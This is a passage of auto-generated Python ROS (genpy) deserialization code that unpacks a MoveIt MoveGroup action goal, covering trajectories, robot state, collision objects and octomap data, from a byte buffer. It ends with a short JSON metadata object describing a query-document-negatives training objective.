_get_struct_4d().unpack(str[start:end]) _x = val2 start = end end += 25 (_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight,) = _get_struct_2dBd().unpack(str[start:end]) val1.visibility_constraints.append(val2) self.goal.request.trajectory_constraints.constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.reference_trajectories = [] for i in range(0, length): val1 = moveit_msgs.msg.GenericTrajectory() _v240 = val1.header start = end end += 4 (_v240.seq,) = _get_struct_I().unpack(str[start:end]) _v241 = _v240.stamp _x = _v241 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v240.frame_id = str[start:end].decode('utf-8') else: _v240.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.joint_trajectory = [] for i in range(0, length): val2 = trajectory_msgs.msg.JointTrajectory() _v242 = val2.header start = end end += 4 (_v242.seq,) = _get_struct_I().unpack(str[start:end]) _v243 = _v242.stamp _x = _v243 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v242.frame_id = str[start:end].decode('utf-8') else: _v242.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = 
_struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] val2.joint_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.points = [] for i in range(0, length): val3 = trajectory_msgs.msg.JointTrajectoryPoint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.positions = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.velocities = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.accelerations = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.effort = struct.unpack(pattern, str[start:end]) _v244 = val3.time_from_start _x = _v244 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) val2.points.append(val3) val1.joint_trajectory.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.cartesian_trajectory = [] for i in range(0, length): val2 = moveit_msgs.msg.CartesianTrajectory() _v245 = val2.header start = end end += 4 (_v245.seq,) = _get_struct_I().unpack(str[start:end]) _v246 = _v245.stamp _x = _v246 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v245.frame_id = str[start:end].decode('utf-8') else: _v245.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.tracked_frame = str[start:end].decode('utf-8') else: val2.tracked_frame = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.points = [] for i in range(0, length): val3 = moveit_msgs.msg.CartesianTrajectoryPoint() _v247 = val3.point _v248 = _v247.pose _v249 = _v248.position _x = _v249 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v250 = _v248.orientation _x = _v250 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v251 = _v247.velocity _v252 = _v251.linear _x = _v252 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v253 = _v251.angular _x = _v253 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v254 = _v247.acceleration _v255 = _v254.linear _x = _v255 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v256 = _v254.angular _x = _v256 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v257 = val3.time_from_start _x = _v257 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) val2.points.append(val3) val1.cartesian_trajectory.append(val2) self.goal.request.reference_trajectories.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.planner_id = str[start:end].decode('utf-8') else: self.goal.request.planner_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if 
python3: self.goal.request.group_name = str[start:end].decode('utf-8') else: self.goal.request.group_name = str[start:end] _x = self start = end end += 28 (_x.goal.request.num_planning_attempts, _x.goal.request.allowed_planning_time, _x.goal.request.max_velocity_scaling_factor, _x.goal.request.max_acceleration_scaling_factor,) = _get_struct_i3d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.name = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.name = str[start:end] _x = self start = end end += 12 (_x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.position = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.velocity = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.effort = struct.unpack(pattern, str[start:end]) _x = self start = end end += 12 (_x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') 
else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms = [] for i in range(0, length): val1 = geometry_msgs.msg.Transform() _v258 = val1.translation _x = _v258 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v259 = val1.rotation _x = _v259 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist = [] for i in range(0, length): val1 = geometry_msgs.msg.Twist() _v260 = val1.linear _x = _v260 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v261 = val1.angular _x = _v261 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench = [] for i in range(0, length): val1 = geometry_msgs.msg.Wrench() _v262 = val1.force _x = _v262 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v263 = val1.torque _x = _v263 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects = [] for i in range(0, length): val1 = moveit_msgs.msg.AttachedCollisionObject() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _v264 = val1.object _v265 = _v264.header start = end end += 4 (_v265.seq,) = _get_struct_I().unpack(str[start:end]) _v266 = _v265.stamp _x = _v266 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v265.frame_id = str[start:end].decode('utf-8') else: _v265.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v264.id = str[start:end].decode('utf-8') else: _v264.id = str[start:end] _v267 = _v264.type start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v267.key = str[start:end].decode('utf-8') else: _v267.key = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v267.db = str[start:end].decode('utf-8') else: _v267.db = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.primitives = [] for i in range(0, length): val3 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val3.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += 
struct.calcsize(pattern) val3.dimensions = struct.unpack(pattern, str[start:end]) _v264.primitives.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.primitive_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v268 = val3.position _x = _v268 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v269 = val3.orientation _x = _v269 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v264.primitive_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.meshes = [] for i in range(0, length): val3 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.triangles = [] for i in range(0, length): val4 = shape_msgs.msg.MeshTriangle() start = end end += 12 val4.vertex_indices = _get_struct_3I().unpack(str[start:end]) val3.triangles.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.vertices = [] for i in range(0, length): val4 = geometry_msgs.msg.Point() _x = val4 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val3.vertices.append(val4) _v264.meshes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.mesh_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v270 = val3.position _x = _v270 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v271 = val3.orientation _x = _v271 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v264.mesh_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.planes = [] for i in range(0, length): val3 = shape_msgs.msg.Plane() start = end end += 32 val3.coef = _get_struct_4d().unpack(str[start:end]) _v264.planes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.plane_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v272 = val3.position _x = _v272 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v273 = val3.orientation _x = _v273 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v264.plane_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.subframe_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v264.subframe_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.subframe_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v274 = val3.position _x = _v274 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v275 = val3.orientation _x = _v275 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v264.subframe_poses.append(val3) start = end end += 1 (_v264.operation,) = _get_struct_b().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.touch_links = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2 = str[start:end].decode('utf-8') else: val2 = str[start:end] val1.touch_links.append(val2) _v276 = val1.detach_posture _v277 = _v276.header start = end end += 4 (_v277.seq,) = 
_get_struct_I().unpack(str[start:end]) _v278 = _v277.stamp _x = _v278 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v277.frame_id = str[start:end].decode('utf-8') else: _v277.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v276.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v276.joint_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v276.points = [] for i in range(0, length): val3 = trajectory_msgs.msg.JointTrajectoryPoint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.positions = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.velocities = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.accelerations = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.effort = struct.unpack(pattern, str[start:end]) _v279 = val3.time_from_start _x = _v279 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) _v276.points.append(val3) start = end end += 8 (val1.weight,) = _get_struct_d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects.append(val1) start = end end += 1 (self.goal.planning_options.planning_scene_diff.robot_state.is_diff,) = _get_struct_B().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.is_diff = bool(self.goal.planning_options.planning_scene_diff.robot_state.is_diff) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.robot_model_name = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.robot_model_name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.fixed_frame_transforms = [] for i in range(0, length): val1 = geometry_msgs.msg.TransformStamped() _v280 = val1.header start = end end += 4 (_v280.seq,) = _get_struct_I().unpack(str[start:end]) _v281 = _v280.stamp _x = _v281 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v280.frame_id = str[start:end].decode('utf-8') else: _v280.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.child_frame_id = str[start:end].decode('utf-8') else: val1.child_frame_id = str[start:end] _v282 = val1.transform _v283 = _v282.translation _x = _v283 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v284 = _v282.rotation _x = _v284 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) 
self.goal.planning_options.planning_scene_diff.fixed_frame_transforms.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values = [] for i in range(0, length): val1 = moveit_msgs.msg.AllowedCollisionEntry() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sB'%length start = end end += struct.calcsize(pattern) val1.enabled = struct.unpack(pattern, str[start:end]) val1.enabled = map(bool, val1.enabled) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sB'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values = struct.unpack(pattern, str[start:end]) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values = map(bool, self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_padding = [] for i in range(0, length): val1 = moveit_msgs.msg.LinkPadding() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] start = end end += 8 (val1.padding,) = _get_struct_d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_padding.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_scale = [] for i in range(0, length): val1 = moveit_msgs.msg.LinkScale() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] start = end end += 8 (val1.scale,) = _get_struct_d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_scale.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.object_colors = [] for i in range(0, length): val1 = moveit_msgs.msg.ObjectColor() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.id = str[start:end].decode('utf-8') else: val1.id = str[start:end] _v285 = val1.color _x = _v285 start = end end += 16 (_x.r, _x.g, _x.b, _x.a,) = 
_get_struct_4f().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.object_colors.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.world.collision_objects = [] for i in range(0, length): val1 = moveit_msgs.msg.CollisionObject() _v286 = val1.header start = end end += 4 (_v286.seq,) = _get_struct_I().unpack(str[start:end]) _v287 = _v286.stamp _x = _v287 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v286.frame_id = str[start:end].decode('utf-8') else: _v286.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.id = str[start:end].decode('utf-8') else: val1.id = str[start:end] _v288 = val1.type start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v288.key = str[start:end].decode('utf-8') else: _v288.key = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v288.db = str[start:end].decode('utf-8') else: _v288.db = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.primitives = [] for i in range(0, length): val2 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val2.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val2.dimensions = struct.unpack(pattern, str[start:end]) val1.primitives.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.primitive_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v289 = val2.position _x = _v289 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v290 = val2.orientation _x = _v290 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.primitive_poses.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.meshes = [] for i in range(0, length): val2 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.triangles = [] for i in range(0, length): val3 = shape_msgs.msg.MeshTriangle() start = end end += 12 val3.vertex_indices = _get_struct_3I().unpack(str[start:end]) val2.triangles.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.vertices = [] for i in range(0, length): val3 = geometry_msgs.msg.Point() _x = val3 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val2.vertices.append(val3) val1.meshes.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.mesh_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v291 = val2.position _x = _v291 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v292 = val2.orientation _x = _v292 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.mesh_poses.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.planes = [] for i in range(0, length): val2 = shape_msgs.msg.Plane() start = end end += 32 val2.coef = _get_struct_4d().unpack(str[start:end]) val1.planes.append(val2) start = end end += 4 (length,) = 
_struct_I.unpack(str[start:end]) val1.plane_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v293 = val2.position _x = _v293 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v294 = val2.orientation _x = _v294 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.plane_poses.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.subframe_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2 = str[start:end].decode('utf-8') else: val2 = str[start:end] val1.subframe_names.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.subframe_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v295 = val2.position _x = _v295 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v296 = val2.orientation _x = _v296 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.subframe_poses.append(val2) start = end end += 1 (val1.operation,) = _get_struct_b().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.world.collision_objects.append(val1) _x = self start = end end += 12 (_x.goal.planning_options.planning_scene_diff.world.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.world.octomap.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.world.octomap.header.frame_id = str[start:end] _x = self start = end end += 68 (_x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.w, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.frame_id = str[start:end] start = end end += 1 (self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary,) = _get_struct_B().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary = bool(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: 
self.goal.planning_options.planning_scene_diff.world.octomap.octomap.id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.id = str[start:end] start = end end += 8 (self.goal.planning_options.planning_scene_diff.world.octomap.octomap.resolution,) = _get_struct_d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sb'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.world.octomap.octomap.data = struct.unpack(pattern, str[start:end]) _x = self start = end end += 28 (_x.goal.planning_options.planning_scene_diff.is_diff, _x.goal.planning_options.plan_only, _x.goal.planning_options.look_around, _x.goal.planning_options.look_around_attempts, _x.goal.planning_options.max_safe_execution_cost, _x.goal.planning_options.replan, _x.goal.planning_options.replan_attempts, _x.goal.planning_options.replan_delay,) = _get_struct_3BidBid().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.is_diff = bool(self.goal.planning_options.planning_scene_diff.is_diff) self.goal.planning_options.plan_only = bool(self.goal.planning_options.plan_only) self.goal.planning_options.look_around = bool(self.goal.planning_options.look_around) self.goal.planning_options.replan = bool(self.goal.planning_options.replan) return self except struct.error as e: raise genpy.DeserializationError(e) #most likely buffer underfill
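The generated deserialize method above repeats one pattern for every variable-length field: unpack a 4-byte little-endian uint32 length with _struct_I, advance the running start/end offsets, slice that many bytes out of the buffer, and decode them as UTF-8; fixed-width numeric fields are read the same way with precompiled structs such as _get_struct_3d or _get_struct_4d, and a short buffer surfaces as the struct.error that gets re-raised as genpy.DeserializationError (the "buffer underfill" comment). The following is a minimal, self-contained sketch of that pattern only; the helper names read_string and read_point are invented for the illustration and are not part of the generated module.

    import struct

    _struct_I = struct.Struct('<I')    # 4-byte little-endian length prefix
    _struct_3d = struct.Struct('<3d')  # three float64 values, e.g. a point (x, y, z)

    def read_string(buf, end):
        # Length-prefixed UTF-8 string: uint32 length, then that many bytes.
        start = end
        end += 4
        (length,) = _struct_I.unpack(buf[start:end])
        start = end
        end += length
        return buf[start:end].decode('utf-8'), end

    def read_point(buf, end):
        # Fixed-width block: 24 bytes holding three little-endian doubles.
        start = end
        end += 24
        return _struct_3d.unpack(buf[start:end]), end

    # Round trip: pack a frame_id and a position, then parse them back.
    payload = _struct_I.pack(len(b'base_link')) + b'base_link' + _struct_3d.pack(1.0, 2.0, 3.0)
    frame_id, offset = read_string(payload, 0)
    (x, y, z), offset = read_point(payload, offset)
    assert (frame_id, (x, y, z)) == ('base_link', (1.0, 2.0, 3.0))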
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
